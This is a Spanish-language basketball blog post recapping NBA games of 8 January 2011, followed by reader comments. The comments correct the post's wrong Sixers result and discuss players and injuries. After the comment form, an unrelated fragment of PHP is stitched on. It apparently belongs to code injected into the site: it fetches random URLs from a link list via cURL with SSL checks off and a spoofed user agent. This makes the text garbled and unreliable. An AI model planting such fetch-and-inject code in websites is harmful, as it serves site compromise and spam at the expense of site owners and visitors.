La Crónica (08/01/2011)

09 de January de 2011 por TheDeerHunter

Octava derrota de los Celtics. En esta ocasión los Bulls fueron demasiado para ellos. 21 rebotes de diferencia y una gran defensa que no les dejó en ningún momento compensar el juego. Definitivamente no era noche para Harangody, ni casi para ninguno de los verdes. Como último recurso en una noche poco propicia intentaron buscar las cosquillas en la circulación, logrando 12 robos y provocando 21 pérdidas, pero ni por esas. Rose y Boozer se encargaron de cerrar la victoria para los suyos.

Orlando reduce distancias y logró su 9ª victoria consecutiva contra unos impotentes Mavericks. Partido perfecto para los de Van Gundy. Los 8 hombres que puso en pista rozaron o superaron ampliamente los dobles dígitos perfectamente bien dirigidos por Turkoglu con nada menos que 17 asistencias.
Atlanta también se mantiene a rueda de Orlando gracias a su brillante victoria contra Indiana. Josh Smith estuvo inmenso coqueteando con el triple doble, bien secundado además por Jo Jo y Jamal Crawford.

En la Northwest se mantiene el pulso entre los Jazz y los Thunder. Los primeros necesitaron una prórroga y la mejor versión de Paul Millsap para ganar en Houston. Tremendo duelo contra Luis Scola. Los Thunder sacaron a pasear al genio de Durant para lograr contrarrestar el gran partido de Randolph y Gay de Memphis.

Para ir terminando los Sixers también necesitaron de prórroga y un extraordinario partido de su banca para ganar a Detroit. Evan Turner fue el mejor de los suyos.

Los Bucks destrozaron a los Nets con un inmenso Ilyasova jugando de pívot y los Bobcats hicieron lo propio con los Wizards.

MVP: Kevin Durant fue demasiado para los Grizzlies con 40 puntos, 8 rebotes, 4 asistencias y un tapón de regalo.

El rookie: Teníamos ganas de nombrar a Evan Turner por estos lares. Anoche fue actuación (19 ptos 5 rebotes y 5 asistencias) fue vital para que su equipo sacara la victoria en Detroit.

La sorpresa: Ver a Ilyasova jugar de Center y que se coma con patatas a Brook Lopez es algo bastante noticioso. La capacidad anotador de DeShawn Stevenson también tiene resulta sorprendente. Por último tampoco podemos dejar de mencionar el partidazo de Gerald Henderson para los Bobcats. ¿Dónde lo tenían escondido?

La decepción: Si en los Nets Brook Lopez te registra un 2-5 y Travis Outlaw un 1 de 7 apaga y vámonos.

El mayor esfuerzo en vano: Los 24-10 y 4 asistencias de Luis Scola y el esfuerzo sobre Millsap sólo le sirvió para jugar 44 minutos sin mayor premio.

Comenta

11 comentarios a esta entrada

  1. luigi_sal dice:
    #1

    TheDeer, te has colado. Philly perdió en la prórroga con los Pistons…

      Citar

  2. kantonyo dice:
    #2

    Efectivamente, Detroit ganó a Sixers. Por cierto es curioso que esta temporada sea una de las mejores de Tayshaun Prince en cuestión de números, nunca ha tenido tan buenos porcentajes de 2 y 3 puntos, y sólo un año superó los 14.6 puntos de media que lleva en este momento. Por sensaciones la verdad que me sorprende muchísimo.

    Por otra parte, los Celtics tienen un grave problema con el rebote, son el tercer peor equipo de la liga y en la derrota de ayer capturaron 27 por los 48 de Chicago.

    Los Nets se hunden y mucha culpa parece ser de Avery Johnson.

    ¿Alguien sabe a que se debe el gran bajón de Granger este año? Si estuviera al nivel del año pasado, los Pacers se clasificarían cómodamente para playoffs.

      Citar

  3. a dice:
    #3

    Hombre, evidentemente que no esté Perkins es un handicap con el rebote. Garnett y Davis no destacan por eso, y los O’neal no pueden ni con su alma.
    Para ganar a Chicago en su casa tienes que estar perfecto, y ayer no fue el día de los Celtics. Además, Rose se motiva contra Rondo, vaya usted a saber por qué.

    A ver si vuelven ya Garnett y Perkins y encadenamos una buena racha…

      Citar

  4. HeiNeKeN dice:
    #4

    20-10 de Farmar hoy ante la ausencia de Harris y tambien buen partido de Humphries, pero es que ni aun asi funcionan los Nets…

      Citar

  5. Busky23 dice:
    #5

    Ayer viendo el Thunders-Memphis vi claramente lo poco que cuenta Marc  en ataque,solo 4 tiros en 34 minutos contra el “poderoso” juego interior de los Thunder,ridículo. El que si lo aprovecho fue Randolph,que lleva un mesecito de All-Star,al igual que Rudy Gay.
    Oj Mayo,está acabadísimo,al menos en este equipo,ayer regaló un 5 de 17!.
    Por parte de los Thunder    partidaco de Durant,y eso que falló 6 d los 7 triples que intentó que sino…
    No entiendo el poco protagonismo que le dan a Harden,para mi,un crack.

      Citar

  6. sergio dice:
    #6

    Kantonyo yo no veo a Granger a menor nivel como dices. Creo que el entrenador esta repartiendo mas los tiros en el equipo porque cuenta con mas y mejores efectivos en ataque que años anteriores. Lo poco que lo he visto este año (4 o 5 partidos no permiten sacar demasiadas conclusiones), me dice que esta mucho mas centrado en la defensa que años anteriores. Al menos lo veo con mejores movimientos laterales y mas agresivo al defender. Por poner un dato, solo 4 aleros han metido mas de 20 puntos ante los Pacers (Gay, Durant, James y si quieres… Gerald Wallace).

    ¿Lo de Turkoglu en los Magic se puede considerar transformismo? Desde luego no se si achacarlo a que le beneficia el sistema o a la motivacion… vosotros direis

      Citar

  7. HeiNeKeN dice:
    #7

    Lo de Turkoglu se debe a que tiene pase VIP en Disneylandia…

      Citar

  8. scriers dice:
    #8

    Se explica porque hay jugadores que, como diría Lillo :P, se encuentran mejor en determinado contexto y familiarizados con tal y cual ambiente. A veces no es fácil saber porque algunos jugadores rinden más o menos según el entorno. Turkoglu se arrastraba en Toronto, un equipo donde debía ser uno de los líderes, y no aportó absolutamente nada en los Suns, sin embargo ahora hace partidos memorables, como coger muchos rebotes o dar muchas asistencia en cuestión de días.

      Citar

  9. CAMPO2 dice:
    #9

    Yo a Lillo mucho caso no le hago y menos desde que no se que mundial lo hechaban en Antena 3 y el salia en los debates y ponia acento argentino para hacerse el interesante, lo de Turkoglu es inexplicable, porque en los otros dos equipos no hacia ni un partido bueno ni por equivocacion y no me refiero a la alineacion de astros que parece que ha sucedido en orlando sino a un 15-5-3 por ejemplo

      Citar

  10. Denise dice:
    #10

    Importante lesión para Lakers, Matt Barnes KO para los próximos 2 meses.
    Dejo aquí su mensaje en Twitter.
    “I told you guys I’d keep you posted, I have a tear in my meniscus I’ll be out 8 weeks I have surgery scheduled early next week..”
    “Os dije que os mantendría actualizados, tengo un desgarro en el menisco y estaré fuera 8 semanas. tengo previsto operarme la próxima semana”

      Citar

  11. TheDeerHunter dice:
    #11

    buena noticia… obviamente no la lesión, sino que lo tendremos plenamente para playoffs.

    siento la confusión con Philly… hubiera jurado que habían ganado

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>